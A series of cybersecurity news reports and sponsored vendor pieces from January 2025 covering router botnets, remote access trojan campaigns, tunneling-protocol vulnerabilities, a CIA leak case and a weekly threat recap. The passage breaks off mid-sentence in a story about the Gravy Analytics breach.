A global network of about 13,000 hijacked Mikrotik routers has been employed as a botnet to propagate malware via spam campaigns, the latest addition to a list of botnets powered by MikroTik devices.The activity "take[s] advantage of misconfigured DNS records to pass email protection techniques," Infoblox security researcher David Brunsdon said in a technical report published last week. "This botnet uses a global network of Mikrotik routers to send malicious emails that are designed to appear to come from legitimate domains."The DNS security company, which has codenamed the campaign Mikro Typo, said its analysis sprang forth from the discovery of a malspam campaign in late November 2024 that leveraged freight invoice-related lures to entice recipients into launching a ZIP archive payload.The ZIP file contains an obfuscated JavaScript file, which is then responsible for running a PowerShell script designed to initiate an outbound connection to a command-and-control (C2) server located at the IP address 62.133.60[.]137.The exact initial access vector used to infiltrate the routers is unknown, but various firmware versions have been affected, including those vulnerable to CVE-2023-30799, a critical privilege escalation issue that could be abused to achieve arbitrary code execution."Regardless of how they've been compromised, it seems as though the actor has been placing a script onto the [Mikrotik] devices that enables SOCKS (Secure Sockets), which allow the devices to operate as TCP redirectors," Brunsdon said."Enabling SOCKS effectively turns each device into a proxy, masking the true origin of malicious traffic and making it harder to trace back to the source."Elevating the concern is the lack of authentication required to use these proxies, thereby allowing other threat actors to weaponize specific devices or the entire botnet for malicious purposes, ranging from distributed denial-of-service (DDoS) attacks to phishing campaigns.The malspam campaign in question has been found to exploit a misconfiguration in the sender policy framework (SPF) TXT records of 20,000 domains, giving the attackers the ability to send emails on behalf of those domains and bypass various email security protections.Specifically, it has emerged that the SPF records are configured with the extremely permissive "+all" option, essentially defeating the purpose of having the safeguard in the first place. This also means that any device, such as the compromised MikroTik routers, can spoof the legitimate domain in email.MikroTik device owners are recommended to keep their routers up-to-date and change default account credentials to prevent any exploitation attempts."With so many compromised MikroTik devices, the botnet is capable of launching a wide range of malicious activities, from DDoS attacks to data theft and phishing campaigns," Brunsdon said. "The use of SOCKS4 proxies further complicates detection and mitigation efforts, highlighting the need for robust security measures."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

Jan 21, 2025Ravie LakshmananBotnet / VulnerabilityCybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc_Botnet.The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh Trivedi said in an analysis.The campaign is known to be active since at least July 2024, with over 1,370 systems infected to date. A majority of the infections have been located in Malaysia, Mexico, Thailand, Indonesia, and Vietnam.Evidence shows that the botnet leverages known security flaws such as CVE-2017-17215 and CVE-2024-7029 to gain initial access to the Internet of Things (IoT) devices and download the next stage payload by means of a shell script.The script, for its part, fetches the botnet malware and executes it depending on the CPU architecture. The end goal of these attacks is to weaponize the botnet for carrying out distributed denial-of-service (DDoS) attacks.The development comes weeks after a Mirai botnet variant named gayfemboy was found exploiting a recently disclosed security flaw impacting Four-Faith industrial routers since early November 2024. Back in mid-2024, Akamai also revealed that CVE-2024-7029 was abused by malicious actors to enlist AVTECH devices into a botnet.Last week, details emerged about another large-scale DDoS attack campaign targeting major Japanese corporations and banks since the end of 2024 by making use of an IoT botnet formed by exploiting vulnerabilities and weak credentials. Some of the other targets are concentrated around the U.S., Bahrain, Poland, Spain, Israel, and Russia.The DDoS activity has been found to single out telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services sectors. Over 55% of the compromised devices are located in India, followed by South Africa, Brazil, Bangladesh, and Kenya."The botnet comprises malware variants derived from Mirai and BASHLITE," Trend Micro said. "The botnet's commands include those that can incorporate various DDoS attack methods, update malware, and enable proxy services."The attacks involve infiltrating IoT devices to deploy a loader malware that fetches the actual payload, which then connects to a command-and-control (C2) server and awaits further instructions for DDoS attacks and other purposes.To safeguard against such attacks, it's advised to monitor suspicious processes, events, and network traffic spawned by the execution of any untrusted binary/scripts. It's also recommended to apply firmware updates and change the default username and password.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 21, 2025Ravie LakshmananCyber Espionage / SurveillanceA former analyst working for the U.S. Central Intelligence Agency (CIA) pleaded guilty to transmitting top secret National Defense Information (NDI) to individuals who did not have the necessary authorization to receive it and attempted to cover up the activity.Asif William Rahman, 34, of Vienna, was an employee of the CIA since 2016 and had a Top Secret security clearance with access to Sensitive Compartmented Information (SCI). He was charged with two counts of unlawfully transmitting NDI in November 2024 following his arrest.He has pleaded guilty to two counts of willful retention and transmission of classified information related to the national defense. He is expected to be sentenced on May 15, 2025, potentially facing a maximum penalty of 10 years in prison.According to court filings, Rahman is alleged to have retained without authorization two documents classified as Top Secret on or about October 17, 2024, and delivered it to multiple individuals who were not entitled to receive it."In the spring of 2024, the defendant accessed and printed from his workstation approximately five documents. These documents were classified at the Secret and Top Secret level," court documents filed on January 17, 2025, reveal. "The defendant transported those materials outside of his place of employment and to his residence by concealing those materials inside a backpack.""From his residence in the Eastern District of Virginia, the defendant reproduced the documents and, while doing so, altered them in an effort to conceal their source and his activity. The defendant then communicated Top Secret information he learned in the course of his employment to multiple individuals he knew were not entitled to receive it. He also transmitted the reproductions of the Secret and Top Secret documents to multiple individuals he knew were not entitled to receive them."Rahman is also said to have shared an additional 10 documents classified at the Top Secret level in a similar manner in the fall of 2024. Then on October 17, he printed two more Top Secret documents pertaining to a United States ally and its planned kinetic actions against a foreign adversary.The defendant then proceeded to photograph these documents from his residence and used a computer program to edit the images. The documents were then shared with unspecified people who were not supposed to them. These individuals are believed to have shared the information with others, eventually causing the documents to appear on several social media platforms on October 18.While the names of the countries were not disclosed, multiple reports from Axios and CNN revealed around that time that the release was linked to Israel's plans to attack Iran. The documents, prepared by the National Geospatial-Intelligence Agency and the National Security Agency, were posted on Telegram by an account called Middle East Spectator.Rahman has also been accused of deleting the files and altering journal entries and written work products on his personal electronic devices in an effort to conceal his personal opinions on U.S. policy. He further drafted entries to paint a false, seemingly benign narrative regarding his deletion of records on his personal device and the CIA workstation."Government employees who are granted security clearances and given access to our nation's classified information must promise to protect it," said Executive Assistant Director Robert Wells of the Federal Bureau of Investigation's National Security Branch. "Rahman blatantly violated that pledge and took multiple steps to hide his actions."Philippines Arrests Chinese National and 2 Filipinos for EspionageThe development comes as the Philippines' National Bureau of Investigation (NBI) disclosed the arrest of a Chinese national and two Filipino citizens suspected of conducting surveillance on critical infrastructure facilities for over a month.The three individuals, Deng Yuanqing, Ronel Jojo Balundo Besa and Jayson Amado Fernandez, are part of a group consisting of six members who engage in surveillance operations by unlawfully obtaining sensitive information related to national defense. The remaining three members, two hardware engineers and a financier (aka Wang), are currently in China, the agency added.Deng, per the NBI, is a software engineer with specialization in automation and control engineering and is allegedly affiliated with the PLA University Science and Technology, a Nanjing-based academic institution under the control of China's People's Liberation Army (PLA).The investigation also uncovered that a white vehicle was procured and fitted with information and communications technology (ICT) equipment so as to facilitate the Intelligence, Surveillance, and Reconnaissance (ISR) operation."From December 13, 2024 to January 16, 2025, subject vehicle was monitored traversing to and fro the National Capital Region and the general divisions of Luzon, conducting detailed scouting, collating comprehensive image of the terrains and structures and the over-all topography of the potential targets, without consent and authority from the Philippine Government," the NBI said.The agency also noted that an onsite search led to the discovery of a Chinese character user account with device ID 918 452 619 controlling the computer system inside the subject vehicle, such as the portable keyboard, files, and cameras.The Philippines has been a target of several Chinese threat actors in recent years, primarily driven by geopolitical tensions in Southeast Asia over ongoing territorial disputes in the South China Sea.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 21, 2025The Hacker NewsImagine receiving a penetration test report that leaves you with more questions than answers. Questions like, "Were all functionalities of the web app tested?" or " Were there any security issues that could have been identified during testing?" often go unresolved, raising concerns about the thoroughness of the security testing. This frustration is common among many security teams. Pentest reports, while crucial, frequently lack the depth and detail necessary to truly assess the success of the project.Even with years of experience working with cybersecurity teams and managing ethical hacking projects, we frequently encountered these same issues. Whether collaborating with external pentest providers or managing our own projects as founders of Hackrate, we often faced difficulties in ensuring that the testing was as comprehensive as it needed to be.This realization inspired us to create HackGATE, a managed gateway solution built to bring transparency and control to pentesting projects, ensuring no questions are left unanswered about the quality and thoroughness of the penetration test projects. We aimed to not only address our own challenges but also to provide the cybersecurity industry with a powerful tool to enhance visibility in their ethical hacking projects.Common Challenges in Penetration Testing1. Lack of visibility and controlA recent survey on pentest projects revealed that 60% of security professionals struggle to measure the success of their pentests. Additionally, nearly two-thirds (65%) of respondents rely solely on information provided by the pentest vendor. This highlights a significant gap in the cybersecurity landscape: the lack of a solution offering visibility into pentesting activities. Without such a solution, security teams struggle with limited insight into crucial aspects of the testing process, including the overall scope and duration of the tests, the specific techniques and attack vectors employed, and the detailed steps taken by ethical hackers.2. Dependence on the final pentest reportMost companies that outsource pentests depend on a final report and their trust in the pentest vendor to assess success. Without concrete evidence of the various aspects of the testing, security teams are left with concerns and security blind spots, encountering obstacles both in understanding their security testing projects and in communicating their outcomes to leadership and stakeholders.3. Coordination in remote pentester teamsManaging a globally distributed team, particularly when working across different time zones, adds to these challenges. This can lead to delays in communication and coordination, resulting in missed deadlines and incomplete tasks. Ensuring that all team members adhere to the same standards across various locations is also challenging. Inconsistent practices can lead to gaps in pentest coverage, leaving critical vulnerabilities undiscovered.How HackGATE Addresses These Challenges1. Enhanced visibility and detailed insightsHackGATE provides real-time visibility into pentest activities. For instance, it details the security testing traffic sent to targets, highlights targeted testing areas, and outlines the methods used by ethical hackers. This transparency ensures you can track the security testing process effectively. 2. Establishing a quality framework for ethical hackingTo ensure the quality of the testing process, it is crucial to establish controls based on analyzed data. Ethical hackers use guidelines and best practices, such as the OWASP guidelines, to provide a structured approach to identifying security risks. While OWASP's framework offers a thorough evaluation of web applications, auditing the security tests is still necessary to verify that pentesters are truly following the guidelines.HackGATE ensures the effectiveness of penetration tests by establishing baselines for minimum testing traffic, which includes both manual and automated testing activities. This ensures thoroughness and consistency in assessments.3. Consolidated and visualized dataPenetration tests generate large volumes of data, which can be difficult to analyze and understand with traditional Security Operation Center solutions. Teams need a centralized dashboard that consolidates key insights, showing the most important metrics, so all stakeholders can easily keep up with progress and monitor ethical hacking activities.HackGATE's unified dashboard addresses this need by consolidating critical insights into a single view. It includes features for project management, analytics, and a detailed overview of pentester activities. This allows all stakeholders to easily access and understand the key metrics without sifting through disparate sources.4. Better coordination across distributed security teamsBy providing a unified interface for all team members, HackGATE ensures that everyone adheres to the same standards, reducing inconsistencies in pentest coverage. The platform also supports comprehensive scope coverage by enabling accurate and detailed reporting, ensuring that all intended assets are tested and documented.HackGATE also enhances accountability by automatically generating detailed reports, providing evidence of testing. This not only helps in holding team members accountable but also simplifies the audit process, ensuring regulatory compliance with a clear and accessible audit trail.HackGATE approachTo ensure successful penetration testing initiatives, security teams need to adopt the 'Trust but Verify' principle in penetration test. This means that instead of relying solely on their pentest provider's report, they need to be able to verify the quality and thoroughness of the testing. But how can they achieve this? The 'Trust but Verify' approach requires accurate data, effective monitoring, and detailed reporting. Most companies still struggle due to the lack of methodology and tools.ConclusionTo ensure your penetration testing projects are comprehensive and compliant, consider integrating innovative monitoring tools like HackGATE into your cybersecurity strategy. For a more in-depth understanding of how it can address your specific needs, schedule a consultation with our technical experts - no sales pitch, just a detailed exploration of how our solution can enhance your pentest approach. Visit the HackGATE website to get started or arrange your personalized technical consultation.Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 21, 2025Ravie LakshmananCyber Attack / Windows SecurityCybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT.The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week.The infection chain commences with a phishing page that's designed to encourage victims to download a malicious Microsoft Installer (MSI) package disguised as legitimate software. Once executed, the installer deploys a benign application to avoid arousing suspicion, while also stealthily extracting an encrypted archive containing the malware payload."The MSI package uses the Windows Installer's CustomAction feature, enabling it to execute malicious code, including running an embedded malicious DLL that decrypts the archive (all.zip) using a hardcoded password 'hello202411' to extract the core malware components," security researcher Nicole Fishbein said.These include a rogue DLL ("libcef.dll"), a legitimate application ("down.exe") that's used as a cover to conceal the malicious activities, and two payload files masquerading as PNG images ("aut.png" and "view.png").The main objective of the DLL loader, PNGPlug, is to prepare the environment for executing the main malware by injecting "aut.png" and "view.png" into memory in order to set up persistence by making Windows Registry changes and executing ValleyRAT, respectively.ValleyRAT, detected in the wild since 2023, is a remote access trojan (RAT) that's capable of providing attackers with unauthorized access and control over infected machines. Recent versions of the malware have incorporated features to capture screenshots and clear Windows event logs.It's assessed to be linked to a threat group called Silver Fox, which also shares tactical overlaps with another activity cluster named Void Arachne owing to the use of a command-and-control (C&C) framework called Winos 4.0.The campaign is unique for its focus on the Chinese-speaking demographic and the use of software-related lures to activate the attack chain."Equally striking is the attackers' sophisticated use of legitimate software as a delivery mechanism for malware, seamlessly blending malicious activities with seemingly benign applications," Fishbein said."The adaptability of the PNGPlug loader further elevates the threat, as its modular design allows it to be tailored for multiple campaigns."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 21, 2025Ravie LakshmananMalware / Cyber ThreatThe Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests.The AnyDesk requests claim to be for conducting an audit to assess the "level of security," CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to exploit user trust."It is important to note that CERT-UA may, under certain circumstances, use remote access software such as AnyDesk," CERT-UA said. "However, such actions are taken only after prior agreement with the owners of objects of cyber defense through officially approved communication channels."However, for this attack to succeed, it's necessary that the AnyDesk remote access software is installed and operational on the target's computer. It also requires the attacker to be in possession of the target's AnyDesk identifier, suggesting that they may have to first obtain the identifier through other methods.To mitigate the risk posed by these attacks, it's essential that remote access programs are enabled only for the duration of their use and the remote access is coordinated through official communication channels.News of the campaign comes as Ukraine's State Service for Special Communications and Information Protection (SSSCIP) revealed that the cyber agency's incident response center detected over 1,042 incidents in 2024, with malicious code and intrusion efforts accounting for more than 75% of all the events."In 2024, the most active cyber threat clusters were UAC-0010, UAC-0050, and UAC-0006, specializing in cyber espionage, financial theft, and information-psychological operations," the SSSCIP said.UAC-0010, also known as Aqua Blizzard and Gamaredon, is estimated to be behind 277 incidents. UAC-0050 and UAC-0006 have been found to be linked to 99 and 174 incidents, respectively.The development also follows the discovery of 24 previously unreported .shop top-level domains likely associated with the pro-Russian hacking group known as GhostWriter (aka TA445, UAC-0057, and UNC1151) by connecting disparate campaigns targeting Ukraine last year.An analysis undertaken by security researcher Will Thomas (@BushidoToken) found that the domains used in these campaigns used the same generic top-level domain (gTLD), the PublicDomainsRegistry registrar, and Cloudflare name servers. All the identified servers also have a robots.txt directory configured.As the Russo-Ukrainian war approaches the end of its third year, cyber-attacks have also been recorded against Russia with an aim to steal sensitive data and disrupt business operations by deploying ransomware.Last week, cybersecurity company F.A.C.C.T. attributed the Sticky Werewolf actor to a spear-phishing campaign directed against Russian research and production enterprises to deliver a remote access trojan known as Ozone that's capable of granting remote access to infected Windows systems.It also described Sticky Werewolf as a pro-Ukrainian cyberspy group that mainly singles out state institutions, research institutes, and industrial enterprises in Russia. However, a previous analysis from Israeli cybersecurity company Morphisec pointed out that this connection "remains uncertain."It's not known how successful these attacks were. Some of the other threat activity clusters that have been observed targeting Russian entities in recent months include Core Werewolf, Venture Wolf, and Paper Werewolf (aka GOFFEE), the last of which has leveraged a malicious IIS module called Owowa to facilitate credential theft.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 20, 2025Ravie LakshmananAndroid / MalwareThe Threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks.The artifacts in question, named Tanzeem (meaning "organization" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the user interface."Although the app is supposed to function as a chat application, it does not work once installed, shutting down after the necessary permissions are granted," Cyfirma noted in a Friday analysis. "The app's name suggests that it is designed to target specific individuals or groups both inside and outside the country."DoNot Team, also tracked as APT-C-35, Origami Elephant, SECTOR02, and Viceroy Tiger, is a hacking group believed to be of Indian origin, with historical attacks leveraging spear-phishing emails and Android malware families to gather information of interest.In October 2023, the threat actor was linked to a previously undocumented .NET-based backdoor called Firebird targeting a handful of victims in Pakistan and Afghanistan.It's currently not clear who the exact targets of the latest malware were, although it's suspected that they were used against specific individuals with the aim of collecting intelligence gathering against internal threats.A notable aspect of the malicious Android app is the use of OneSignal, a popular customer engagement platform used by organizations to send push notifications, in-app messages, emails, and SMS messages. Cyfirma theorized that the library is being abused to send notifications containing phishing links that lead to malware deployment.Regardless of the distribution mechanism used, the app displays a fake chat screen upon installation and urges the victim to click a button named "Start Chat." Doing so triggers a message that instructs the user to grpermissionions to the accessibility services API, thus allowing it to perform various nefarious actions. The app also requests access to several sensitive permissions that facilitate the collection of call logs, contacts, SMS messages, precise locations, account information, and files present in external storage. Some of the other features include capturing screen recordings and establishing connections to a command-and-control (C2) server."The collected samples reveal a new tactic involving push notifications that encourage users to install additional Android malware, ensuring the persistence of the malware on the device," Cyfirma said."This tactic enhances the malware's ability to remain active on the targeted device, indicating the threat group's evolving intentions to continue participating in intelligence gathering for national interests."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 20, 2025Ravie LakshmananNetwork Security / VulnerabilityNew research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks."Internet hosts that accept tunneling packets without verifying the sender's identity can be hijacked to perform anonymous attacks and provide access to their networks," Top10VPN said in a study, as part of a collaboration with KU Leuven professor and researcher Mathy Vanhoef.As many as 4.2 million hosts have been found susceptible to the attacks, including VPN servers, ISP home routers, core internet routers, mobile network gateways, and content delivery network (CDN) nodes. China, France, Japan, the U.S., and Brazil top the list of the most affected countries.Successful exploitation of the shortcomings could permit an adversary to abuse a susceptible system as one-way proxies, as well as conduct denial-of-service (DoS) attacks."An adversary can abuse these security vulnerabilities to create one-way proxies and spoof source IPv4/6 addresses," the CERT Coordination Center (CERT/CC) said in an advisory. "Vulnerable systems may also allow access to an organization's private network or be abused to perform DDoS attacks."The vulnerabilities are rooted in the fact that the tunneling protocols such as IP6IP6, GRE6, 4in6, and 6in4, which are mainly used to facilitate data transfers between two disconnected networks, do not authenticate and encrypt traffic without adequate security protocols like Internet Protocol Security (IPsec).The absence of additional security guardrails opens the door to a scenario where an attacker can inject malicious traffic into a tunnel, a variation of a flaw that was previously flagged in 2020 (CVE-2020-10136).They have been assigned the following CVE identifiers for the protocols in question -CVE-2024-7595 (GRE and GRE6)CVE-2024-7596 (Generic UDP Encapsulation)CVE-2025-23018 (IPv4-in-IPv6 and IPv6-in-IPv6)CVE-2025-23019 (IPv6-in-IPv4)"An attacker simply needs to send a packet encapsulated using one of the affected protocols with two IP headers," Top10VPN's Simon Migliano explained."The outer header contains the attacker's source IP with the vulnerable host's IP as the destination. The inner header's source IP is that of the vulnerable host IP rather than the attacker. The destination IP is that of the target of the anonymous attack."Thus when the vulnerable host receives the malicious packet, it automatically strips the outer IP address header and forwards the inner packet to its destination. Given that the source IP address on the inner packet is that of the vulnerable but trusted host, it's able to get past network filters.As defenses, it's recommended to use IPSec or WireGuard to provide authentication and encryption, and only accept tunneling packets from trusted sources. At the network level, it's also advised to implement traffic filtering on routers and middleboxes, carry out Deep packet inspection (DPI), and block all unencrypted tunneling packets."The impact on victims of these DoS attacks can include network congestion, service disruption as resources are consumed by the traffic overload, and crashing of overloaded network devices," Migliano said. "It also opens up opportunities for further exploitation, such as man-in-the-middle attacks and data interception."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 20, 2025The Hacker NewsData Security / Data MonitoringEvery week seems to bring news of another data breach, and it's no surprise why: securing sensitive data has become harder than ever. And it's not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting stricter and more elaborate. The problem is that while the data landscape has evolved rapidly, the usual strategies for securing that data are stuck in the past. Gone are the days when data lived in predictable places, with access controlled by a chosen few. Today, practically every department in the business needs to use customer data, and AI adoption means huge datasets, and a constant flux of permissions, use cases, and tools. Security teams are struggling to implement effective strategies for securing sensitive data, and a new crop of tools, called data security platforms, have appeared on the scene in the past few years to address the gap.One of these players, Satori, claims their data security platform can "secure all data, from production to AI". We wanted to investigate this claim. But first, what does that even mean for security teams? Let's break it down into two parts: "secure all data" and "from production to AI." Secure all dataWhen Satori says it secures all data, it means that unlike other data security platforms, Satori focuses on securing every type of data within an organization, not just a specific subset. Legacy data security solutions, including DSPM (Data Security Posture Management) platforms, primarily focus on securing analytical data data that is typically used for business intelligence or reporting. However, Satori extends its security to cover operational data, semi-structured data, and other data types that other platforms may overlook. This comprehensive approach ensures that not only is your analytical data secure, but all forms of data, including semi-structured, are protected throughout their lifecycle.From Production to AI"From production to AI" refers to the security of data across the entire pipeline, from its creation and use in production environments to its application in AI models and processes. This is where many data security solutions fall short. Legacy platforms often focus primarily on securing data in analytical environments like data lakes, warehouses, and lakehouses. But they often neglect operational or production data, where risks can arise.For example, developers or engineers may need temporary access to production databases to address issues or perform maintenance. Without proper safeguards, giving them access can lead to over-privileged access, making them an internal threat. Satori's approach helps mitigate this risk by ensuring that access to sensitive production data is tightly controlled, even for temporary or emergency situations. Furthermore, legacy data security solutions neglect BI tools, leaving implementation of row-level security on these tools to security teams - not a simple task. Satori, on the other hand, supports fine-grained access control on BI tools, allowing security teams to manage access to them alongside data stores.So how does it work?You can't secure data if you don't know what data you have and where it's located. Satori combines the visibility capabilities offered by DSPMs, which are required by security teams to secure customer data. This makes it easy to answer the primary data security questions across databases, data warehouses, and data lakes:Where are my data assets (databases, warehouses, etc)?Satori continuously discovers and monitors data assets.Where is my sensitive data?Satori continuously classifies data and tags it with appropriate data type tags.Who has access to what data?Satori analyzes your data store configuration to give you data access governance and understand what users have access to what data.Who has access to what sensitive data?When combined with Satori's continuous data discovery and classification, you know who has access to a specific database or table and what types of sensitive data are used.Who is doing what, with what data?Satori gives you complete Data Activity Monitoring across all your data stores in a central location. You can easily enrich audit logs by creating customized access log reports for platforms like Splunk, Snowflake, DataDog, or Elastic. That way, you know exactly what users were doing with the data, who approved these activities, and what security policies were applied.In Satori, data stores are discovered automatically by scanning cloud accounts or added directly in the management console, via API or with Terraform. Connect all of your cloud accounts to Satori and receive notifications for all of the new data stores and data assets added to them.Once discovered, data stores are continuously monitored to produce a full inventory of the data assets they contain, classified to the column level with a broad set of out-of-the-box or customer-built classifiers. A mapping of the permissions structure is performed to clearly show which users have access to what data assets. Finally, any risky misconfiguration that may degrade their security posture is detected, with alerts produced for the relevant teams to remediate. Teams can use Satori's posture manager to get an overview of your organization's database user permissions over time:More than visibilityMost security teams go about tackling the data security challenge in a sequential process:Map out your dataIdentify who has access to what dataApply controls to reduce risk and meet compliance requirementsThe problem with this approach is that teams often get stuck in step 1, getting caught in a loop as new data stores and users are introduced. Satori overhauls this process by introducing automation at every step. Both the work of discovering and classifying data and the enforcement of security policies happen in real time, adjusting automatically as new data stores are added.Satori makes it easy to enforce the appropriate security controls at scale, using: RBAC (role-based access control) and ABAC (attribute-based access control)Satori allows organizations to apply RBAC and ABAC universally, even on platforms that do not have such native support.You can create masking profiles, which can then be used to create dynamic masking policies.Temporary data accessWhen users need access to data, they can get it automatically for a set amount of time. This relieves the organization of over-privileged data access, one of the main root causes of sensitive data exposure.Fine-grained access control across multiple data storesFor example, you can apply data masking to your Snowflake cloud data, as well as your MSSQL and Postgres databases.Enforcement of approval workflowsIn many cases, access to most datasets requires approval from data owners or data stewards. Satori makes it easy to implement such a process directly or by integrating with workflow tools like Jira, ServiceNow, or even Slack.Final wordsSatori doesn't just show you where your data is or who has access to it it helps you actively control it, from production databases to AI models. By automating key tasks like discovering sensitive data, managing permissions, and enforcing access controls, Satori makes protecting data simpler and more effective. For security teams, it's a way to move beyond just mapping data security risks and actually mitigate them.To learn more about Satori, visit Satori's website or schedule a 1:1 demo meeting.Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can't be fought with old-school methods.To stay ahead, we need to understand how cybersecurity is now tied to diplomacy, where the safety of networks is just as important as the power of words. Threat of the WeekU.S. Treasury Sanctions Chinese and North Korean Entities The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) leveled sanctions against a Chinese cybersecurity company (Sichuan Juxinhe Network Technology Co., LTD.) and a Shanghai-based cyber actor (Yin Kecheng) over their alleged links to Salt Typhoon and Silk Typhoon threat clusters. Kecheng was associated with the breach of the Treasury's own network that came to light earlier this month. The department has also sanctioned two individuals and four organizations in connection with the North Korean fraudulent IT worker scheme that aims to generate revenue for the country by dispatching its citizens to China and Russia to obtain employment at various companies across the world using false identities. Top NewsSneaky 2FA Phishing Kit Targets Microsoft 365 Accounts A new adversary-in-the-middle (AitM) phishing kit called Sneaky 2FA has seen moderate adoption among malicious actors for its ability to steal credentials and two-factor authentication (2FA) codes from Microsoft 365 accounts since at least October 2024. The phishing kit is also called WikiKit owing to the fact that site visitors whose IP address originates from a data center, cloud provider, bot, proxy, or VPN are directed to a Microsoft-related Wikipedia page. Sneaky 2FA also shares some code overlaps with another phishing kit maintained by the W3LL Store.FBI Deletes PlugX Malware from Over 4,250 Computers The U.S. Department of Justice (DoJ) disclosed that a court-authorized operation allowed the Federal Bureau of Investigation (FBI) to delete a variant of the PlugX malware from over 4,250 infected computers as part of a "multi-month law enforcement operation." The malware, attributed to the China-nexus Mustang Panda threat actor, is known to spread to other systems via attached USB devices. The disruption is part of a larger effort led by the Paris Prosecutor's Office and cybersecurity firm Sekoia that has resulted in the disinfection payload being sent to 5,539 IP addresses across 10 countries.Russian Hackers Target Kazakhstan With HATVIBE Malware The Russian threat actor known as UAC-0063 has been attributed to an ongoing cyber espionage campaign targeting Kazakhstan as part of the Kremlin's efforts to gather economic and political intelligence in Central Asia. The spear-phishing attacks leverage lures related to the Ministry of Foreign Affairs to drop a malware loader named HATVIBE that's then used to deploy a backdoor called CHERRYSPY.Python Backdoor Leads to RansomHub Ransomware Cybersecurity researchers have detailed an attack that started with a SocGholish infection, which then paved the way for a Python backdoor responsible for deploying RansomHub encryptors throughout the entire impacted network. The Python script is essentially a reverse proxy that connects to a hard-coded IP address and allows the threat actor to move laterally in the compromised network using the victim system as a proxy.Google Ads Users Targeted by Malicious Google Ads In an ironic twist, a new malvertising campaign has been found targeting individuals and businesses advertising via Google Ads by attempting to phish for their credentials via fraudulent ads on Google. The brazen tactic is being used to hijack advertiser accounts and push more ads to perpetuate the campaign further. Google said the activity violates its policies and it's taking active measures to disrupt it. Trending CVEsYour go-to software could be hiding dangerous security flawsdon't wait until it's too late! Update now and stay ahead of the threats before they catch you off guard.This week's list includes CVE-2025-21333, CVE-2025-21334, CVE-2025-21335 (Windows Hyper-V NT Kernel Integration VSP), CVE-2024-55591 (Fortinet), CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, CVE-2024-13159 (Ivanti Endpoint Manager), CVE-2024-7344 (Howyar Taiwan), CVE-2024-52320, CVE-2024-48871 (Planet Technology WGS-804HPT industrial switch), CVE-2024-12084 (Rsync), CVE-2024-57726, CVE-2024-57727, CVE-2024-57728 (SimpleHelp), CVE-2024-44243 (Apple macOS), CVE-2024-9042 (Kubernetes), CVE-2024-12365 (W3 Total Cache plugin), CVE-2025-23013 (Yubico), CVE-2024-57579, CVE-2024-57580, CVE-2024-57581, CVE-2024-57582 (Tenda AC18), CVE-2024-57011, CVE-2024-57012, CVE-2024-57013, CVE-2024-57014, CVE-2024-57015, CVE-2024-57016, CVE-2024-57017, CVE-2024-57018, CVE-2024-57019, CVE-2024-57020, CVE-2024-57021, CVE-2024-57022, CVE-2024-57023, CVE-2024-57024, CVE-2024-57025 (TOTOLINK X5000R), CVE-2025-22785 (ComMotion Course Booking System plugin), and 44 vulnerabilities in Wavlink AC3000 routers. Around the Cyber WorldThreat Actors Advertise Insider Threat Operations Bad actors have been identified advertising services on Telegram and dark web forums that aim to connect prospective customers with insiders as well as recruit people working at various companies for malicious purposes. According to Nisos, some of the messages posted on Telegram request for insider access to Amazon in order to remove negative product reviews. Others offer insider services to process refunds. "In one example, the threat actors posted that they would connect buyers to an insider working at Amazon, who could perform services for a fee," Nisos said. "The threat actors clarified that they were not the insider, but had access to one."U.K. Proposes Banning Ransom Payments by Government Entities The U.K. government is proposing that all public sector bodies and critical national infrastructure, including the NHS, local councils, and schools, refrain from making ransomware payments in an attempt to hit where it hurts and disrupt the financial motivation behind such attacks. "This is an expansion of the current ban on payments by government departments," the government said. "This is in addition to making it mandatory to report ransomware incidents, to boost intelligence available to law enforcement and help them disrupt more incidents."Gravy Analytics Breach Leaks Sensitive Location Data Gravy Analytics, a bulk location data provider that has offered its services to government agencies and law enforcement through its Venntel subsidiary, revealed that it suffered a hack and data breach, thereby threatening the privacy of millions of people around the world who had their location information revealed by thousands of Android and iOS apps to the data broker. It's believed that the threat actors gained access to the AWS environment through a "misappropriated" key. Gravy Analytics said it was informed of the hack through communication from the threat actors on January 4, 2025. A small sample data set has since been published in a Russian forum containing data for "tens of millions of data points worldwide," Predicta Lab CEO Baptiste Robert said. Much of the data collection is occurring through the advertising ecosystem, specifically a process called real-time bidding (RTB), suggesting that even app developers' may not be aware of the practice. That said, it's currently unclear how Gravy Analytics 